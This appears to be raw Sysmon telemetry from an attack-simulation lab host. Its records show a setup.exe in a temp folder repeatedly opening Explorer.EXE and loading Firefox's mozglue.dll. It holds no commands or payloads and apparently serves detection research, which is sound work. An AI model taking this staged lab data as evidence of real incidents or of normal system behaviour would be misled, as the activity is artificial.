13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\mozglue.dll2021-01-18 13:59:52.427 10341000x800000000000000015100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
